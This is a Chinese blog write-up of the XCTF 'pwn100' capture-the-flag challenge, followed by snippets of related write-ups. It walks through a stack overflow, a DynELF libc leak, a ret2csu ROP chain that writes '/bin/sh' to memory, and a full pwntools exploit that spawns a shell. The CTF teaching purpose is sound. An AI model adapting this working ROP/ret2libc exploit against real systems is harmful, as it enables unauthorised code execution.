攻防世界pwn100 详细的WP

最新推荐文章于 2021-12-12 14:36:53 发布
最新推荐文章于 2021-12-12 14:36:53 发布
阅读量929 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Zarcs_233/article/details/104056817
本文详细解析了一个64位系统上的pwn题目,通过检查程序安全配置,利用栈溢出漏洞,借助DynELF泄露system地址,再利用ROP技术修改寄存器值,最终实现对内存区域的任意写入,注入'/bin/sh'并获取shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

pwn萌新做pwn题了
首先checksec

shellcode肯定是行不通了
IDA打开看看

发现有个函数,读取200字节,但a1数组却只有40字节,出现了栈溢出漏洞,那么EIP就是在48字节之后的八个字节
查看程序导入,发现没有system,查看string,发现没有’/bin/sh’
所以要先想办法泄露system的地址,用Dynelf即可,那么如何写泄露函数呢?
由于是64位系统,所以得想办法修改rdi寄存器的值,找到相应的代码段(gadget,例如pop rdi,ret),然后利用ROP执行过去修改rdi,最后还要跳回到start,代码复用

p=process("./pwn100")
elf=ELF("./pwn100")
puts_addr=elf.plt["puts"]
read_addr=elf.got["read"]
start_addr=0x400550
rdi=0x400763    #pop rdi,ret
def leak(addr):
	payload='a'*0x48+p64(rdi)+p64(addr)   
	payload+=p64(puts_addr)+p64(start_addr)   #构造puts栈帧,泄露地址,然后返回到start
	payload=payload.ljust(200,'a')    #由于要读入200字节,补全即可
	p.send(payload)
	p.recvuntil("bye~\n")
	before=""
	buf=""
	count=0
	while True:    #puts函数截断,需要独特的读取技巧
		c=p.recv(numb=1,timeout=0.5)
		count+=1
		if before=='\n' and c=="":
			buf=buf[:-1]
			buf+="\x00"
			break
		else:
			buf+=c
			before=c
	buf=buf[:4]  #这就是泄露的地址
	log.info("%#x => %s" % (addr,(buf or '').encode('hex')))
	return buf
libc=DynELF(leak,elf=elf)
sys_addr=libc.lookup("system","libc")
print(hex(sys_addr))

这样就可以泄露system的地址了
但是还得有system的参数’/bin/sh’
由于导入了read,函数于是乎可以利用rop对内存区域进行任意写,随便找块可写的地址写入参数

rop1=0x40075A
rop2=0x400740
payload='a'*0x48+p64(rop1)+p64(0)+p64(1)+p64(read_addr)+p64(8)+p64(0x601000)+p64(1)
payload=payload+p64(rop2)+"\x00"*56+p64(start_addr)
payload=payload.ljust(200,'a')
p.send(payload)
p.recvuntil("bye~\n")
p.send("/bin/sh\x00")

来解释下这个payload吧
先看看rop1和rop2

我们知道read有三个参数,所以必须要使用的三个传参寄存器rdi, rsi, rdx
在这一段代码中都有相应的代码进行修改。
所以这里看得出,rdi(edi)由r15d修改,rsi由r14修改,rdx由r13修改,而这里的r13,r14,r15由0x40075A处的代码进行修改。

所以我们需要先修改r13 r14 r15,然后再mov给rdi,rsi,rdx
于是乎可以得到payload要先执行0x40075A处,再执行0x400740.
而rop1为什么要从pop rbx开始呢,我们看看400740处的代码,发现有个call和jmp,既然我们要调用read为什么不直接用现成的代码段,而非再构建一个呢?
所以我们可以控制r12为read地址,rbx为0,这样r12+rbx*8就是read的地址,同时又可以绕过后面的jnz,岂不美哉!!!!

当然我们可以发现,执行了rop2,后面的六个pop再次执行了一遍,这是没有意义的,但是你执行完rop2在覆盖eip的时候,会进行六个pop,还有个add rsp,8.
从这里可以看出栈指针rsp下降了7*8个字节,而ret是根据栈顶来取地址放入eip的,所以在中间还要填充56个字节(这里是’\x00’)

现在已经得到了system地址和’/bin/sh’,最后在利用一次,获取shell
代码汇总一下:

from pwn import *
context.log_level='debug'
p=process("./pwn100")
elf=ELF("./pwn100")
puts_addr=elf.plt["puts"]
read_addr=elf.got["read"]
start_addr=0x400550
rdi=0x400763
rop1=0x40075A
rop2=0x400740
def leak(addr):
	payload='a'*0x48+p64(rdi)+p64(addr)
	payload+=p64(puts_addr)+p64(start_addr)
	payload=payload.ljust(200,'a')
	p.send(payload)
	p.recvuntil("bye~\n")
	before=""
	buf=""
	count=0
	while True:
		c=p.recv(numb=1,timeout=0.5)
		count+=1
		if before=='\n' and c=="":
			buf=buf[:-1]
			buf+="\x00"
			break
		else:
			buf+=c
			before=c
	buf=buf[:4]
	log.info("%#x => %s" % (addr,(buf or '').encode('hex')))
	return buf
libc=DynELF(leak,elf=elf)
sys_addr=libc.lookup("system","libc")
print(hex(sys_addr))
payload='a'*0x48+p64(rop1)+p64(0)+p64(1)+p64(read_addr)+p64(8)+p64(0x601000)+p64(1)
payload=payload+p64(rop2)+"\x00"*56+p64(start_addr)
payload=payload.ljust(200,'a')
p.send(payload)
p.recvuntil("bye~\n")
p.send("/bin/sh\x00")
payload="a"*0x48+p64(rdi)+p64(0x601000)+p64(sys_addr)
payload=payload.ljust(200,"a")
p.send(payload)
p.interactive()

还有一件事,这个0x601000是可以写的地址,用于写入/bin/sh。。

最后附上另外一个ROP原理解惑文章23333
ROP

PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 574
攻防世界进阶PWN-100 做这道的时候远程环境可能有点问,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
攻防世界 pwn-100
10-26 388
1 目 2 分析 如上图,这道很简单粗暴,直接暴露溢出点,但是需要注意的是,每次输入读200!这点下面会有坑。 思路:利用ROP泄露出read的地址,利用Libsearch获得system和/bin/sh的地址。这些都是常规流程。但是,有一点要注意,在发送payload的时候,一定不能使用sendline或者sendafterline。因为这两个方法会自动在你的payload后面添加\n。本严格读取200单元,多出来的\n作为下次读取的开头,会导致第二次发送的错误!exp如下 f
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3509
一、checksec一下 开启了NX 二、 file一下,查看文件属性 64位文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)和system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT表中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
[攻防世界 pwn]——pwn-100
Y_peak的博客
02-21 345
[攻防世界 pwn]——pwn-100 目地址: https://adworld.xctf.org.cn/ 目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符, 不然不退出循环 思路 leek出来一个地址, 然后找到libc, 计算偏移找到system 和 ‘/bin/sh’ 循环调用, 得到shell from pwn import * from LibcSearcher import * #p = process("./pwn") p = remo
pwn攻防世界 pwn新手区wp
woodwhale的博客
08-10 7367
pwn攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界pwn新手区没有堆(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10给写完了。 1、get_shell 送分,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
攻防世界PWN新手区WP
weixin_45461609的博客
02-23 1957
攻防世界PWNget shellwhen did you bornhello_pwnlevel2待更新 get shell nc + 地址 直接连接cat flag when did you born 运行一遍,报错,段错误,栈溢出 拖进IDA 可以观察到当v5==1926的时候就会cat flag 但是当v5 == 1926 的时候又会报错 观察到这里还有一个v4而且是栈溢出的点 不妨点进去...
攻防世界 pwn进阶区解法 write up(一)
qq_46441427的博客
03-01 461
实时数据监测 找信息 没有发现canary,没有开启PIE和NX 查看ida 发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序 结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞 给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$ 然后确定偏移量: 总共,从A到41包括A有12个,偏移量=12 所以得到payload
攻防世界pwn新手村WP
Sakura给爷pwn全场
12-07 248
攻防世界 一、level0 思路1 from pwn import * context.log_level='debug' r=remote('220.249.52.133',30689) system_addr=0x400596 payload='A'*0x80+'B'*0x8+p64(0x400431)+p64(system_addr) r.recvuntil('\n') r.sendline(payload) r.interactive() 思路2 from pwn import * context
攻防世界 Pwn pwn-100
MrTreebook的博客
12-12 693
攻防世界 Pwn pwn-1001.目下载地址2.checksec3.IDA分析4.exp 1.目下载地址 点击下载 2.checksec 64位程序,目前还什么都看不出看来,直接拉近IDA看看 3.IDA分析 整个程序由3个嵌套的程序组成 我们可以看到sub_40063D是主要的程序,接受单个字符并存储到传入的参数a1所指向的空间之内 同时分析sub_40068E发现sub_40063D中a1就是sub_40068E中的v1 并且v1的栈空间大小就只有0x40,而sub_4006
攻防世界(Pwn) PWN100
半岛铁盒的博客
03-23 277
同时这里还存在一个 v1溢出点 我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,如果多于6个参数才会用栈我们要先知道这个特性 这,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串,这呢,我们可以利用put来泄露read函数的地址,然后再利用LibcSearcher查询可能的libc 这ROP,我们先构造paylo
攻防世界pwn-100(两种方法)详细分析
qy201706的博客
05-05 2245
是比较基础的构造ROP链也比较典型,本菜鸡学了受益匪浅(っ °Д °;)っ 0x1 checksec + file 0x2 拖进ida分析程序: 显然应该进sub_40068E里看看: 鸭儿,继续进sub_40063D(v1,200): 这里就是一个for循环,每次向 i + a1(即:i + v1)所指的内存读取输入1个字节,i 不能大于200 貌似无懈可击,返回去查...
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 3101
是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64位elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
(攻防世界)(2016 L-CTF)pwn100
PLpa的博客
07-12 2579
也是一个DynELF()的栈溢出,不过这里是运用了puts函数而不是write函数,所以我们构造的leak函数就要不同些。 拿到目,我们首先查看一下保护: 可以看到,程序只开启了NX保护。 我们进入IDA看一下程序逻辑,找一找漏洞: 我们找到了puts和read函数,看到了明显的栈溢出漏洞,一般思路就是DynELF函数的利用了: 我们找到我们需要的一些地址,然后开始构造exp: #!...
攻防世界-pwn-100-Writeup
SkYe's Blog
05-15 451
pwn-100 [collapse title=“展开查看详情” status=“false”] 考点:栈溢出、ROP 这个栈溢出每次固定要求输入 200 个字符,也没有别的了。 ROP 操作也不需要往 bss 写入 /bin/sh ,直接在 libc 找一个就好了。(看到网上有这样的操作orz) #encoding:utf-8 from pwn import * context.log_level = 'debug' context(os='linux',arch='amd64') p = remot
攻防世界 - pwn100 - WriteUp
哒君的博客
06-11 4269
pwn100 文件链接 -> Github checksec 寻找漏洞 sub_40063D 函数中获取输入存放到 v1 ,存在栈溢出漏洞 攻击思路 该程序中没用system函数,也没有binsh字符串,而且参数是经过寄存器传递的,所以要通过ROP来达成泄露 libc ,写入 /bin/sh 的操作 寄存器 rdi 中存放的是写入的地址,rsi 是写入的字节数,所以可以通过 po...
攻防世界 pwn100&&pwn200
weixin_45677731的博客
05-18 259
pwn100 拖进ida分析,主要如下: 我的基本思路就是,利用栈溢出,通过puts函数,泄露read函数的地址,通过工具来得到相应的libc版本,返回main函数,进行第二次溢出然后进行攻击 第一次溢出: 由于程序为64位程序,而64位程序的前七个参数是放在寄存器中的,第一个参数是放在rdi寄存器中的,因此,我们要先找到相应的gadgets 我们要用的就是这个了 然后,把read的got地址传入,调用puts函数,返回main函数 第二次溢出: 得到read函数的地址后,通过相应的工具得到对应的li
攻防世界PWN进阶区pwn100/pwn200/warmup
weixin_45461609的博客
05-12 656
攻防世界PWN进阶区pwn200pwn100 pwn200 和CTFWIKI上的ret2libc3大同小异。 条件: 1.有read(),write()函数,无system。 2.在函数sub_8048484中存在栈溢出。 思路: 1.通过栈溢出调用write()函数泄露write()对应的 got 表项的内容,此处将write函数的返回地址设置为main或者sub_8048484的地址以便再次利用栈溢出漏洞 2.通过LibcSearcher获取libc版本 3.获取system函数,”/bi
pwn学习系列--任务3 pwn100
weixin_44113469的博客
01-31 675
pwn100步骤 1.先将pwn100 文件copy到虚拟机里,查看一波,文件是32位的 2.ida里f5 查看main函数 查看buf大小64+4,但read可向buf读入0x100,可看出这是个栈溢出 3.找了老久,我勒个去,没有system函数,身为小白的我,一直纠结这是要干啥,我该怎么办。。。但有getflag函数,额----,flag.txt自己弄,flag文件记得写点东西,不...
攻防世界pwn pwn-100
最新发布
01-18
### 关于攻防世界PWN-100目的解答 #### 解决方案概述 对于攻防世界PWN-100目,通常涉及的是基础的缓冲区溢出攻击。这类目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值